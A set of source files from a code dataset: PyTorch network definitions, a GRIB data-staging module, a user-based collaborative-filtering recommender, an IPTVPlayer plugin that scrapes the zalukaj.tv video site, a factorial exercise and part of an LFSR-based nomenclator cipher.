nn.Conv2d(output_ch*8, output_ch*16, 4, 2, 1), # 2x2x64\n )\n self.linear = nn.Sequential(\n nn.Linear(256, 10),\n nn.Softmax()\n )\n def forward(self, x):\n x = self.nn_net(x)\n x = self.linear(x.flatten(start_dim=1))\n return x\n\nclass ResNetBlock(nn.Module):\n def __init__(self, n_features):\n super(ResNetBlock, self).__init__()\n self.identity = nn.Identity()\n self.block_layers = nn.Sequential(\n nn.Conv2d(n_features, n_features, 3, 1, 1),\n nn.ReLU(),\n nn.Conv2d(n_features, n_features, 3, 1, 1)\n )\n self.relu = nn.ReLU()\n \n def forward(self, x):\n out = self.block_layers(x)\n out += self.identity(x)\n out = self.relu(out)\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, n_in, n_features, num_res_blocks=3):\n super(ResNet, self).__init__()\n #First conv layers needs to output the desired number of features.\n conv_layers = [nn.Conv2d(n_in, n_features, kernel_size=3, stride=1, padding=1),\n nn.ReLU()]\n for i in range(num_res_blocks):\n conv_layers.append(ResNetBlock(n_features))\n self.res_blocks = nn.Sequential(*conv_layers)\n self.fc = nn.Sequential(nn.Linear(32*32*n_features, 2048),\n nn.ReLU(),\n nn.Linear(2048, 512),\n nn.ReLU(),\n nn.Linear(512,10),\n nn.Softmax(dim=1))\n \n def forward(self, x):\n x = self.res_blocks(x)\n #reshape x so it becomes flat, except for the first dimension (which is the minibatch)\n x = x.view(x.size(0), -1)\n out = self.fc(x)\n return out\n","repo_name":"Zurisen/deep-learning-for-computer-vision-DTU","sub_path":"Day1/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34391849342","text":"# ===================================================== #\n# * Contains all staging functions\n# ----------------------------------------------------- #\n# \n# \n# \n# \n# \n#\n# ===================================================== #\n\n\nfrom scripts.services import parse_grib, mkdir\nfrom .config import EXTRACT_GRIB_DIR, STAGED_GRIB_DIR, TRANSFORMED_GRIB_DIR, REQUESTS_DIR\n\nimport logging\nfrom shutil import move\nfrom glob import glob\nimport pandas as pd\nimport os\n\n# ----------------------------------------------------- #\n# * Verify GRIB file\n# ----------------------------------------------------- #\ndef verify_grib(filepath:str) -> bool:\n \"\"\"Verify if corrupted GRIB download\n return: bool, if download is invalid, returns False\n \"\"\"\n logging.info(\" Verifying data..\")\n \n if \".grib\" not in filepath:\n filepath=filepath+\".grib\"\n try: \n df = parse_grib(filepath).to_dataframe().reset_index()\n idx = glob(f\"{filepath}.*\")\n [os.remove(i) for i in idx]\n\n if df.shape[0] > 1 or df.shape[1] > 1:\n logging.info(\" -- OK\")\n return True\n else:\n logging.critical(' Empty Dataframe! %s ' % filepath)\n return None\n\n except Exception as e:\n logging.error(\" Data Verification failed! %s \" % filepath)\n return None\n\n# ----------------------------------------------------- #\n# * Move to directory\n# ----------------------------------------------------- #\ndef moveto(src_filepath:str, src_base:str, dest_base:str, method:str) -> str:\n \"\"\"\n Move files from one stage to another, then update local request record.\n\n Parameters\n -----------\n\n src_filepath: str, source file path\n src_base: str, directory to be replaced\n dest_base: str, directory to be used as replacement to modify the destination directory.\n\n \"\"\"\n try:\n # create destination path\n dest_filepath = src_filepath.replace(src_base, dest_base)\n\n # check if file exists\n if len(glob(src_filepath)) < 1: \n logging.info(f\"[skip] There is nothing to move in: '{src_filepath}'.\")\n return dest_filepath\n \n # get filename, path\n fn = dest_filepath.split('/')[-1]\n path = dest_filepath.replace(fn,'')\n \n # get request df filepath, modify state value\n req_fn = f\"{REQUESTS_DIR}/{fn.replace('.grib','.csv')}\"\n req_df = pd.read_csv(req_fn)\n req_df['state'] = method\n \n # move file\n mkdir(path)\n move(src_filepath, dest_filepath)\n \n # -- disabled to enable date based batch processing in future\n # src_dir = src_filepath.replace(fn,'') \n # rmtree(src_dir)\n \n # save state\n req_df.to_csv(req_fn, index=False)\n mes=f\"[{method}] file {fn} successfully {method}!\"\n logging.info(mes)\n\n return dest_filepath\n except Exception as e:\n raise Exception(e)\n\n# ----------------------------------------------------- #\n# * Move to staging directory\n# ----------------------------------------------------- #\ndef moveto_staged(filepath: str):\n # move file\n dest_filepath = moveto(src_filepath=filepath, src_base=EXTRACT_GRIB_DIR, \n dest_base=STAGED_GRIB_DIR, method='staged')\n # return filepath\n return dest_filepath\n\n\n\n","repo_name":"Kui-03/farm-nav","sub_path":"dags/scripts/staging.py","file_name":"staging.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38433006826","text":"import math\nimport tool\n\ndef userSimilarity(train):\n item_users = dict()\n print(\"生成物品-用户倒排表...\")\n for user, items in train.items():\n for i in items:\n if i not in item_users:\n item_users[i] = set()\n item_users[i].add(user)\n C = dict()\n N = dict()\n print(\"建立相似度矩阵...\")\n item_usersNum = len(item_users)\n usern = 1\n for users in item_users.values():\n print(\"\\r%d/%d\" % (usern, item_usersNum), end=\"\")\n usern += 1\n for u in users:\n if u not in N:\n N[u] = 0\n N[u] += 1\n for v in users:\n if u != v:\n if u not in C:\n C[u] = dict()\n if v not in C[u]:\n C[u][v] = 0\n C[u][v] += 1 / math.log(1 + len(users))\n print(\"\\n计算用户兴趣相似度...\")\n for u, row in C.items():\n for v, cuv in row.items():\n C[u][v] = cuv / math.sqrt(N[u]*N[v])\n sorted_user_sim = {k: sorted(v.items(), key=lambda x: x[1], reverse=True) for k, v in C.items()}\n return sorted_user_sim\n\n# 注意相似用户和推荐物品都是取排名靠前的item,不然就太多���\ndef recommend(user, train, W, userN, itemN):\n rank = dict()\n if user not in W or user not in train:\n return rank\n interacted_items = train[user]\n for v, wuv in W[user][:userN]:\n for vItem in train[v]:\n if vItem not in interacted_items:\n if vItem not in rank:\n rank[vItem] = 0\n rank[vItem] += wuv * 1\n recs = list(sorted(rank.items(), key=lambda x: x[1], reverse=True))[:itemN]\n return recs\n\ndef userCF(userN, itemN, dataScale):\n print(\"加载数据...\")\n train, test = tool.splitData(dataScale, 8, 0)\n rankList = dict()\n W = userSimilarity(train)\n print(\"进行推荐...\")\n # 对test集的user进行推荐\n for user in test.keys():\n rankList[user] = recommend(user, train, W, userN, itemN)\n print(\"进行评估...\")\n eva = tool.Evaluator(train, test, rankList, userN, dataScale)\n eva.show()\n\n# userN, itemN, dataScale\n# 取前N个相关用户,取前N个推荐物品,数据取dataScale%\nuserCF(80, 10, 0.1)\n#dataScale: 0.1 topN: 8 precision: 0.003925417075564278 recall: 0.012327773749093546 coverage: 0.7647241165530069 popularity: 4.132750171483042\n#dataScale: 0.2 topN: 8 precision: 0.009711165756679031 recall: 0.021062146892655367 coverage: 0.7249124854142357 popularity: 4.988955540712396\n#dataScale: 0.2 topN: 80 precision: 0.016363636363636365 recall: 0.035796610169491525 coverage: 0.23561882626380012 popularity: 5.793893530988032\n#dataScale: 0.5 topN: 80 precision: 0.05416666666666667 recall: 0.05580405454151937 coverage: 0.18857459789240155 popularity: 6.717603555313228\n","repo_name":"ChrisCN97/Recommend-System-Practice-Code-Note","sub_path":"Chapter2/userCF.py","file_name":"userCF.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"36283613532","text":"# -*- coding: utf-8 -*-\n\n###################################################\n# LOCAL import\n###################################################\nfrom Plugins.Extensions.IPTVPlayer.components.ihost import IHost, CDisplayListItem, RetHost, CUrlItem\nfrom Plugins.Extensions.IPTVPlayer.libs.pCommon import common, CParsingHelper\nfrom Plugins.Extensions.IPTVPlayer.libs.urlparser import urlparser\n\nfrom Plugins.Extensions.IPTVPlayer.tools.iptvtools import printDBG, CSearchHistoryHelper, GetLogoDir, GetCookieDir\nfrom Plugins.Extensions.IPTVPlayer.libs.youtube_dl.utils import clean_html\n\n###################################################\n# FOREIGN import\n###################################################\nimport re, urllib, urllib2, base64, math \ntry:\n import simplejson\nexcept:\n import json as simplejson \nfrom Components.config import config, ConfigYesNo, ConfigText, getConfigListEntry\n\n###################################################\n# E2 GUI COMMPONENTS \n###################################################\nfrom Plugins.Extensions.IPTVPlayer.components.asynccall import MainSessionWrapper\nfrom Screens.MessageBox import MessageBox\n\n###################################################\n# Config options for HOST\n###################################################\nconfig.plugins.iptvplayer.zalukajtvPREMIUM = ConfigYesNo(default = False)\nconfig.plugins.iptvplayer.zalukajtv_login = ConfigText(default = \"\", fixed_size = False)\nconfig.plugins.iptvplayer.zalukajtv_password = ConfigText(default = \"\", fixed_size = False)\n\ndef GetConfigList():\n optionList = []\n optionList.append(getConfigListEntry(\"Użytkownik PREMIUM Zalukaj.TV?\", config.plugins.iptvplayer.zalukajtvPREMIUM))\n if config.plugins.iptvplayer.zalukajtvPREMIUM.value:\n optionList.append(getConfigListEntry(\" Zalukaj.TV login:\", config.plugins.iptvplayer.zalukajtv_login))\n optionList.append(getConfigListEntry(\" Zalukaj.TV hasło:\", config.plugins.iptvplayer.zalukajtv_password)) \n return optionList\n\n###################################################\n# Title of HOST\n###################################################\ndef gettytul():\n return 'Zalukaj.tv'\n\n###################################################\n# class IPTVHost\n###################################################\nclass IPTVHost(IHost):\n LOGO_NAME = 'zalukajtvlogo.png'\n\n def __init__(self):\n printDBG( \"init begin\" )\n self.host = Host()\n self.prevIndex = []\n self.currList = []\n self.prevList = []\n printDBG( \"init end\" )\n \n def isProtectedByPinCode(self):\n return False\n \n def getLogoPath(self): \n return RetHost(RetHost.OK, value = [ GetLogoDir( self.LOGO_NAME ) ])\n\n def getInitList(self):\n printDBG( \"getInitList begin\" )\n self.prevIndex = []\n self.currList = self.host.getInitList()\n self.host.setCurrList(self.currList)\n self.prevList = []\n printDBG( \"getInitList end\" )\n return RetHost(RetHost.OK, value = self.currList)\n\n def getListForItem(self, Index = 0, refresh = 0, selItem = None):\n printDBG( \"getListForItem begin\" )\n self.prevIndex.append(Index)\n self.prevList.append(self.currList)\n self.currList = self.host.getListForItem(Index, refresh, selItem)\n #self.currList = [ self.prevList[-1][Index] ]\n printDBG( \"getListForItem end\" )\n return RetHost(RetHost.OK, value = self.currList)\n\n def getPrevList(self, refresh = 0):\n printDBG( \"getPrevList begin\" )\n if(len(self.prevList) > 0):\n self.prevIndex.pop()\n self.currList = self.prevList.pop()\n self.host.setCurrList(self.currList)\n printDBG( \"getPrevList end OK\" )\n return RetHost(RetHost.OK, value = self.currList)\n else:\n printDBG( \"getPrevList end ERROR\" )\n return RetHost(RetHost.ERROR, value = [])\n\n def getCurrentList(self, refresh = 0):\n printDBG( \"getCurrentList begin\" )\n #if refresh == 1\n #self.prevIndex[-1] #ostatni element prevIndex\n #self.prevList[-1] #ostatni element prevList\n #tu pobranie listy dla dla elementu self.prevIndex[-1] z listy self.prevList[-1] \n printDBG( \"getCurrentList end\" )\n return RetHost(RetHost.OK, value = self.currList)\n\n def getLinksForVideo(self, Index = 0, item = None):\n return RetHost(RetHost.NOT_IMPLEMENTED, value = [])\n \n def getResolvedURL(self, url):\n printDBG( \"getResolvedURL begin\" )\n if url != None and url != '': \n ret = self.host.getResolvedURL(url)\n if ret != None and ret != '': \n printDBG( \"getResolvedURL ret: \"+ret)\n list = []\n list.append(ret)\n printDBG( \"getResolvedURL end OK\" )\n return RetHost(RetHost.OK, value = list)\n else:\n printDBG( \"getResolvedURL end\" )\n return RetHost(RetHost.NOT_IMPLEMENTED, value = []) \n else:\n printDBG( \"getResolvedURL end\" )\n return RetHost(RetHost.NOT_IMPLEMENTED, value = [])\n\n def getSearchResults(self, pattern, searchType = None):\n printDBG( \"getSearchResults begin\" )\n printDBG( \"getSearchResults pattern: \" +pattern)\n self.prevIndex.append(0)\n self.prevList.append(self.currList)\n self.currList = self.host.getSearchResults(pattern, searchType)\n printDBG( \"getSearchResults end\" )\n return RetHost(RetHost.OK, value = self.currList)\n\n###################################################\n# class HOST\n###################################################\nclass Host:\n currList = []\n MAIN_URL = ''\n PREMIUM = False\n konto = ''\n HOST = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110621 Mandriva Linux/1.9.2.18-0.1mdv2010.2 (2010.2) Firefox/3.6.18'\n\n def __init__(self):\n printDBG( 'Host __init__ begin' )\n self.exSession = MainSessionWrapper()\n self.COOKIEFILE = GetCookieDir('zalukajtv.cookie')\n self.cm = common()\n self.up = urlparser()\n self.history = CSearchHistoryHelper('wspolne')\n self.currList = []\n printDBG( 'Host __init__ end' )\n \n def setCurrList(self, list):\n printDBG( 'Host setCurrList begin' )\n self.currList = list\n printDBG( 'Host setCurrList end' )\n return \n \n def fullUrl(self, phUrl):\n if not phUrl.startswith('http'):\n if '/' == phUrl[0]:\n phUrl = '/' + phUrl\n phUrl = self.MAIN_URL + phUrl\n return phUrl\n\n def getInitList(self):\n printDBG( 'Host getInitList begin' )\n ####################################\n # logowanie\n ####################################\n if config.plugins.iptvplayer.zalukajtvPREMIUM.value:\n url = 'http://zalukaj.tv/account.php'\n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': True, 'host': self.HOST, 'use_cookie': True, 'save_cookie': True, 'load_cookie': False, 'cookiefile': self.COOKIEFILE, 'use_post': True, 'return_data': True },{'login': config.plugins.iptvplayer.zalukajtv_login.value, 'password': config.plugins.iptvplayer.zalukajtv_password.value})\n except:\n printDBG( 'Host getInitList query error' )\n printDBG( 'Host getInitList query error url:'+url )\n printDBG( 'Host getInitList query error: Uzywam Player z limitami')\n data = None\n if data:\n self.PREMIUM = True\n printDBG( 'Host getInitList: chyba zalogowano do premium...' )\n url = 'http://zalukaj.tv/libs/ajax/login.php?login=1'\n try: \n data = self.cm.getURLRequestData({ 'url': url, 'use_host': True, 'host': self.HOST, 'use_cookie': True, 'save_cookie': False, 'load_cookie': True, 'cookiefile': self.COOKIEFILE, 'use_post': False, 'return_data': True })\n printDBG( 'Host listsItems data: '+data )\n parse = re.search('Typ Konta:.*?>(.*?)<.*?>(.*?)<', data, re.S)\n if parse:\n self.konto = '- Typ Konta: '+parse.group(1)+parse.group(2)\n else: \n self.konto = ''\n except:\n printDBG( 'Host getInitList: blad pobrania danych o koncie premium' )\n \n if '' == self.konto:\n self.exSession.open(MessageBox, 'Problem z zalogowaniem użytkownika \\n\"%s\" jako VIP.' % config.plugins.iptvplayer.zalukajtv_login.value, type = MessageBox.TYPE_INFO, timeout = 10)\n\n #if 'Wyloguj' in data:\n # self.PREMIUM = True \n # printDBG('Host getInitList:' + config.plugins.iptvplayer.zalukajtv_login.value + ', Zostales poprawnie zalogowany')\n #else:\n # printDBG('Host getInitList: Blad logowania, uzywam Player z limitami')\n ####################################\n self.currList = self.listsItems(-1, '', 'main-menu')\n printDBG( 'Host getInitList end' )\n return self.currList\n\n def getListForItem(self, Index = 0, refresh = 0, selItem = None):\n printDBG( 'Host getListForItem begin' )\n valTab = []\n if len(self.currList[Index].urlItems) == 0:\n return valTab\n valTab = self.listsItems(Index, self.currList[Index].urlItems[0], self.currList[Index].urlSeparateRequest)\n self.currList = valTab\n printDBG( 'Host getListForItem end' )\n return self.currList\n\n def getSearchResults(self, pattern, searchType = None):\n printDBG( \"Host getSearchResults begin\" )\n printDBG( \"Host getSearchResults pattern: \" +pattern)\n valTab = []\n valTab = self.listsItems(-1, pattern, 'search')\n #valTab = [] #test \n self.currList = valTab\n printDBG( \"Host getSearchResults end\" )\n return self.currList\n\n def listsItems(self, Index, url, name = ''):\n printDBG( 'Host listsItems begin' )\n printDBG( 'Host listsItems url: '+url )\n valTab = []\n if name == 'main-menu':\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv'\n valTab.append(CDisplayListItem('Filmy '+self.konto, 'http://zalukaj.tv', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/'], 'filmy', '', None)) \n valTab.append(CDisplayListItem('Seriale', 'http://zalukaj.tv/seriale', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/seriale'], 'seriale', '', None)) \n valTab.append(CDisplayListItem('Szukaj', 'Szukaj filmów', CDisplayListItem.TYPE_SEARCH, ['http://szukaj.zalukaj.tv/szukaj'], 'seriale', '', None)) \n valTab.append(CDisplayListItem('Historia wyszukiwania', 'Historia wyszukiwania', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/seriale'], 'history', '', None)) \n printDBG( 'Host listsItems end' )\n return valTab\n\n # ########## #\n if 'history' == name:\n printDBG( 'Host listsItems begin name='+name )\n for histItem in self.history.getHistoryList():\n valTab.append(CDisplayListItem(histItem['pattern'], 'Szukaj ', CDisplayListItem.TYPE_CATEGORY, [histItem['pattern'],histItem['type']], 'search', '', None)) \n printDBG( 'Host listsItems end' )\n return valTab\n \n # ########## #\n if 'search' == name:\n printDBG( 'Host listsItems begin name='+name )\n pattern = url \n if Index==-1: \n self.history.addHistoryItem( pattern, 'video')\n url = 'http://k.zalukaj.tv/szukaj'\n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': True, 'return_data': True },{'searchinput': pattern})\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n phMovies = re.findall('class=\"tivief4\".*?src=\"(.*?)\".*?(.*?)<.*?class=\"few_more\">(.*?)<', data, re.S)\n if phMovies:\n for (phImage, phUrl, phTitle, phDescr, phMore) in phMovies:\n printDBG( 'Host listsItems phImage: ' +phImage )\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: ' +phTitle )\n printDBG( 'Host listsItems phDescr: ' +phDescr )\n printDBG( 'Host listsItems phMore: ' +phMore )\n valTab.append(CDisplayListItem(phTitle, phMore+' | '+decodeHtml(phDescr), CDisplayListItem.TYPE_VIDEO, [CUrlItem('', phUrl, 1)], 0, phImage, None)) \n printDBG( 'Host listsItems end' )\n return valTab\n \n # ########## #\n if 'seriale' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n parse = re.search('
    ', data, re.S)\n if not parse: return ''\n phMovies = re.findall('
    (.{1,50})
    %s
    ', '', '
    {date}{type}{sender} ' \\\n '({sender_points_before} → {sender_points_after}){receiver} ' \\\n '({receiver_points_before} → {receiver_points_after}){reason}
    Registered voters 53,662Registered voters 41,604Steve Zorn (DEM) (Write-In) 10Kara Leach Palfy (REP) (Write-In)352Hans V. Romer (LIB) 5,112(?:)?{col_title}(?:\\s)?(?:)?{digits}(?:)?County Total(?:)?County (?:)?([\\w\\s]+)(?:)?Total(?:)?([\\w\\s]+)(?:)?Total 2,087Jay Geyer (IND) 2,087Daneya Esgar (DEM) 20,556Daneya Esgar (DEM) 20,556(.*?)<', data, re.S)\n if phMovies:\n for (phUrl, phTitle) in phMovies:\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: '+phTitle )\n valTab.append(CDisplayListItem(phTitle, phTitle, CDisplayListItem.TYPE_CATEGORY, [self.fullUrl(phUrl)], 'seriale-sezon', phImage, None)) \n printDBG( 'Host listsItems end' )\n return valTab\n if 'seriale-sezon' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n phImage = ''\n parse = re.search('(.*?)<.*?href=\"(.*?)\" title=\"(.*?)\"', data, re.S)\n if phMovies:\n for (phEpisode, phUrl, phTitle) in phMovies:\n printDBG( 'Host listsItems phEpizod: ' +phEpisode )\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: '+phTitle )\n valTab.append(CDisplayListItem(phEpisode+' - '+phTitle, phTitle, CDisplayListItem.TYPE_VIDEO, [CUrlItem('', self.fullUrl(phUrl), 1)], 0, phImage, None)) \n printDBG( 'Host listsItems end' )\n return valTab\n if 'filmy' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n sts,parse = CParsingHelper.getDataBeetwenMarkers(data, '', False)\n phMovies = re.findall('
    ([^<]+?)', parse, re.S)\n if phMovies:\n for (phUrl, phTitle) in phMovies:\n printDBG( 'Host listsItems phUrl: ' + phUrl )\n printDBG( 'Host listsItems phTitle: ' + phTitle )\n valTab.append(CDisplayListItem(phTitle, phTitle, CDisplayListItem.TYPE_CATEGORY, [ self.fullUrl(phUrl) ], 'filmy-clip', '', None)) \n #valTab.insert(0,CDisplayListItem('--Najpopularniejsze--', 'Najpopularniejsze wyswietlenia-miesiac', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/#wyswietlenia-miesiac'], 'filmy-last', '', None)) \n #valTab.insert(0,CDisplayListItem('--Ostatnio oglądane--', 'Ostatnio oglądane', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv/#lastseen'], 'filmy-last', '', None)) \n valTab.insert(0,CDisplayListItem('--Ostatnio dodane--', 'Ostatnio dodane', CDisplayListItem.TYPE_CATEGORY, ['http://zalukaj.tv'], 'filmy-last', '', None)) \n printDBG( 'Host listsItems end' )\n return valTab\n if 'filmy-clip' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n phMovies = re.findall('background-image:url(.*?);\">

    (.*?).*?

    (.*?)<.*?\">(.*?)<.*?class=\"few_more\">(.*?)<', data, re.S)\n if phMovies:\n for (phImage, phRok, phUrl, phTitle, phDescr, phMore) in phMovies:\n printDBG( 'Host listsItems phImage: ' +phImage )\n printDBG( 'Host listsItems phRok: ' +phRok )\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: ' +phTitle )\n printDBG( 'Host listsItems phDescr: ' +phDescr )\n printDBG( 'Host listsItems phMore: ' +phMore )\n valTab.append(CDisplayListItem(phTitle, phRok+' | '+phMore+' | '+decodeHtml(phDescr), CDisplayListItem.TYPE_VIDEO, [CUrlItem('', phUrl, 1)], 0, phImage[1:-1], None)) \n match = re.findall('class=\"pc_current\">.*?href=\"(.*?)\">(.*?)<', data, re.S)\n if match: \n phUrl = match[-1][0]\n phTitle = match[-1][1]\n valTab.append(CDisplayListItem('Strona '+phTitle, 'Strona: '+phUrl, CDisplayListItem.TYPE_CATEGORY, [self.fullUrl(phUrl)], name, '', None)) \n printDBG( 'Host listsItems end' )\n return valTab\n if 'filmy-last' == name:\n printDBG( 'Host listsItems begin name='+name )\n self.MAIN_URL = 'http://zalukaj.tv' \n try: data = self.cm.getURLRequestData({ 'url': url, 'use_host': False, 'use_cookie': False, 'use_post': False, 'return_data': True })\n except:\n printDBG( 'Host listsItems query error' )\n printDBG( 'Host listsItems query error url:'+url )\n return valTab\n #printDBG( 'Host listsItems data: '+data )\n phMovies = re.findall('class=\"tivief4\".*?src=\"(.*?)\".*?

    (.*?)<.*?\">(.*?)<.*?class=\"few_more\">(.*?)<', data, re.S)\n if phMovies:\n for (phImage, phUrl, phTitle, phDescr, phMore) in phMovies:\n printDBG( 'Host listsItems phImage: ' +phImage )\n printDBG( 'Host listsItems phUrl: ' +phUrl )\n printDBG( 'Host listsItems phTitle: ' +phTitle )\n printDBG( 'Host listsItems phDescr: ' +phDescr )\n printDBG( 'Host listsItems phMore: ' +phMore )\n valTab.append(CDisplayListItem(phTitle, phMore+' | '+decodeHtml(phDescr), CDisplayListItem.TYPE_VIDEO, [CUrlItem('', self.fullUrl(phUrl), 1)], 0, phImage, None)) \n printDBG( 'Host listsItems end' )\n return valTab\n\n return valTab\n\n def getResolvedURL(self, url):\n printDBG( 'Host getResolvedURL begin' )\n printDBG( 'Host getResolvedURL url: '+url )\n videoUrl = ''\n valTab = []\n \n if self.PREMIUM:\n sts, data = self.cm.getPage(url, {'use_host': True, 'host': self.HOST, 'use_cookie': True, 'save_cookie': False, 'load_cookie': True, 'cookiefile': self.COOKIEFILE})\n if sts:\n parse = re.search('/player.php.*?\"', data, re.S)\n if parse: \n printDBG( 'parse1p: '+parse.group(0) )\n url2 = self.fullUrl(parse.group(0))\n sts, data = self.cm.getPage(url2, {'use_host': True, 'host': self.HOST, 'use_cookie': True, 'save_cookie': False, 'load_cookie': True, 'cookiefile': self.COOKIEFILE, 'use_post': False, 'return_data': True })\n if sts:\n parse = re.search(' 0: \n printDBG( 'parse3p: PREMIUM: '+match[0] )\n linkvideo = match[0]\n return linkvideo\n else:\n printDBG( 'Host getResolvedURL query error premium' )\n printDBG( 'Host getResolvedURL query error premium url: '+url2 )\n else:\n printDBG( 'Host getResolvedURL query error premium' )\n printDBG( 'Host getResolvedURL query error premium url: '+url2 )\n else:\n printDBG( 'Host getResolvedURL query error premium' )\n printDBG( 'Host getResolvedURL query error premium url: '+url )\n \n if url[0:30] == 'http://zalukaj.tv/zalukaj-film' or url[0:31] == 'http://zalukaj.tv/serial-online': \n sts, data = self.cm.getPage(url)\n if not sts:\n printDBG( 'Host getResolvedURL query error' )\n printDBG( 'Host getResolvedURL query error url: '+url )\n return ''\n \n parse = re.search('/player.php.*?\"', data, re.S)\n if not parse: return '' \n printDBG( 'parse1: '+parse.group(0) )\n url2 = self.fullUrl(parse.group(0))\n sts, data = self.cm.getPage(url2)\n if not sts:\n printDBG( 'Host getResolvedURL query error' )\n printDBG( 'Host getResolvedURL query error url: '+ url2 )\n return ''\n parse = re.search('> \"))\n\nprint(sub_P24.fact(num)) # fact 함수로 num 팩토리얼을 계산해서 출력\n\n\n# sub 파일 이름 => sub_24로 고치기\ndef fact(n): # 입력받은 n을 매개변수로 하는 fact 함수\n\n factor = 1\n\n for i in range(n, 0, -1): # i가 n부터\n factor *= i # n! 구하기\n\n return factor\n\n\nif __name__ == \"__main__\": # 단일로 실행할 경우\n print(fact(5)) # 5!을 실행시켜 출력함\n","repo_name":"Alal11/University-assignments","sub_path":"[1-2] 파이선프로그래밍 (나웅수)/P-2-4.py","file_name":"P-2-4.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21123055810","text":"import random\nimport numpy as np\nfrom RNG.LFSR import LFSR\nfrom RNG.FisherYates import fisherYatesShuffle\n\n# A nomenclator is a cipher that operates on common pieces of language in order\n# to defeat frequency analysis. The Great Cipher designed by Antoine Rossignol\n# for the French in the 1600s mostly used syllables. It also has special\n# symbols for distinctive words that showed up often like the names of various\n# generals. In fact syllables could be written using any of several \"code \n# groups\". \n# This variant is designed for modern English and rather than syllables it \n# uses common letter groups. So a code group could indicate four letters or\n# three or two or one. There are also \"nulls\" randomly inserted. These symbols\n# don't translate to anything and are meannt to be ignored. There is also a\n# supernull which means \"ignore this character and the character that comes\n# immediately after it\".\n# For every block of letters there are multiple code groups that can represent\n# it in order to make frequency analysis even more difficult.\n\n\ndef createCodeGroups(n,decode=False):\n \n # Generate the code groups. Note that there is a space in this so that the\n # code groups will be visibly separated when written out.\n codegroups = [\"{0:03} \".format(i) for i in range(1000)]\n \n \n # Use a LFSR to shuffle the code groups\n L = []\n for ctr,val in enumerate(LFSR(n,[5,6,8,9,11,15,19,31],32)):\n L.append(val)\n if ctr == 1000:\n break\n shuf = fisherYatesShuffle(1000,L)\n codegroups = [codegroups[i] for i in shuf]\n \n \n # There are a preposterously huge number of ways to shuffle the one thousand\n # code groups that exist. The 32 bit LFSR only provides about four billion\n # possible shuffles. While it can be operated by hand it isn't entirely\n # reasonable to pick a new key for every message. Fortunately nomenclator\n # type ciphers require a lot of text in order to mount an attack against them\n # and historically only had the key changed very rarely.\n \n # If working by hand isn't necessary a stronger modern algorithm can be used\n # to perform the shuffle.\n #random.seed(n)\n #random.shuffle(codegroups)\n # Now reset the random seed\n #random.seed()\n \n \n ## Our list of text symbols is taken from the Ngram data that we have\n ngrams1 = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\NGrams\\\\1grams.csv', 'r')\n ngrams2 = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\NGrams\\\\2grams.csv', 'r')\n ngrams3 = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\NGrams\\\\3grams.csv', 'r')\n ngrams4 = open('C:\\\\Users\\\\Alexander\\\\Documents\\\\GitHub\\\\ClassicCrypto\\\\NGrams\\\\4grams.csv', 'r')\n \n codeDict = {}\n \n # Put letters and letter groups into the dictionary with each assigned to\n # a number that reflects how colmmon it is.\n for n,d in enumerate(ngrams1):\n L = d.split(\",\")\n codeDict[L[0]] = int(L[1])\n \n for n,d in enumerate(ngrams2):\n L = d.split(\",\")\n codeDict[L[0]] = int(L[1])\n if n > 